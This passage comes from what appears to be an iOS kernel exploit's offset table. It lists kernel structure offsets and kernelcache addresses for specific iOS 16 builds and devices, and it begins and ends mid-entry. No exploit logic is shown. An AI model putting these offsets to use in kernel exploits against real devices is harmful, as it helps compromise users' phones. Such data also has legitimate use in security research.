.proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E246", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E252", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:36 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8112", .build_version = "20F66", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa81288, .kernelcache__gPhysBase = 0xfffffe0007a8c100, .kernelcache__gPhysSize = 0xfffffe0007a8c100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a8a2d8, .kernelcache__perfmon_devices = 0xfffffe000aabf520, .kernelcache__perfmon_dev_open = 0xfffffe00080d9214, .kernelcache__ptov_table = 0xfffffe00079d7180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aabe990, .kernelcache__vm_pages = 0xfffffe00079d3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d6130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aabe988, .kernelcache__vn_kqfilter = 0xfffffe0008125d84, }, //Xs max 16.1.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20B110", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a221150, .kernelcache__gPhysBase = 0xfffffff0078179d8, .kernelcache__gPhysSize = 0xfffffff0078179d8 + 8, .kernelcache__gVirtBase = 0xfffffff007815bc0, .kernelcache__perfmon_devices = 0xfffffff00a25c300, .kernelcache__perfmon_dev_open = 0xfffffff007e6e79c, .kernelcache__ptov_table = 0xfffffff0077cb890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25b780, .kernelcache__vm_pages = 0xfffffff0077c86c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ca850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25b778, .kernelcache__vn_kqfilter = 0xfffffff007ec0d00, }, //beta iOS // iPhone XR 16.2 beta 1 // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Sun Oct 16 17:48:37 PDT 2022; root:xnu-8792.60.32.0.1~10/RELEASE_ARM64_T8020", .build_version = "20C5032e", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a16d9a8, .kernelcache__gPhysBase = 0xfffffff007807bc0, .kernelcache__gPhysSize = 0xfffffff007807bc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007805da0, .kernelcache__perfmon_devices = 0xfffffff00a1a9530, .kernelcache__perfmon_dev_open = 0xfffffff007e53d18, .kernelcache__ptov_table = 0xfffffff0077bb348, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1a8900, .kernelcache__vm_pages = 0xfffffff0077b8180, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ba308, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1a88f8, .kernelcache__vn_kqfilter = 0xfffffff007ea6294, }, // iPhone XR 16.2 beta 2 // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Tue Nov 1 21:21:17 PDT 2022; root:xnu-8792.60.51.122.1~1/RELEASE_ARM64_T8020", .build_version = "20C5043e", .device_id = "iPhone11,8", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a16d9a8, .kernelcache__gPhysBase = 0xfffffff007807df0, .kernelcache__gPhysSize = 0xfffffff007807df0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007805fd0, .kernelcache__perfmon_devices = 0xfffffff00a1a95b0, .kernelcache__perfmon_dev_open = 0xfffffff007e54180, .kernelcache__ptov_table = 0xfffffff0077bb348, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1a8980, .kernelcache__vm_pages = 0xfffffff0077b8180, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ba308, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1a8978, .kernelcache__vn_kqfilter = 0xfffffff007ea6830, }, // iPhone 13 iOS 16.5 beta 20F5050f // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Sun Apr 16 16:47:41 PDT 2023; root:xnu-8796.120.47.0.1~37/RELEASE_ARM64_T8110", .build_version = "20F5050f", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a515a30, .kernelcache__gPhysBase = 0xfffffff0079502a8, .kernelcache__gPhysSize = 0xfffffff0079502a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e480, .kernelcache__perfmon_devices = 0xfffffff00a553750, .kernelcache__perfmon_dev_open = 0xfffffff007f1e7e0, .kernelcache__ptov_table = 0xfffffff007903280, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a552b10, .kernelcache__vm_pages = 0xfffffff0078fffc0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902230, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a552b08, .kernelcache__vn_kqfilter = 0xfffffff007f6b3ec, }, //iPhone 12 iOS 16.3 beta 20D5035i // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:39:04 PST 2023; root:xnu-8792.80.25.122.5~1/RELEASE_ARM64_T8101", .build_version = "20D5035i", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d59c0, .kernelcache__gPhysBase = 0xfffffff007850258, .kernelcache__gPhysSize = 0xfffffff007850258 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784e438, .kernelcache__perfmon_devices = 0xfffffff00a4115e0, .kernelcache__perfmon_dev_open = 0xfffffff007ee5398, .kernelcache__ptov_table = 0xfffffff0078034b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a410980, .kernelcache__vm_pages = 0xfffffff0078001d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802468, .kernelcache__vm_page_array_ending_addr 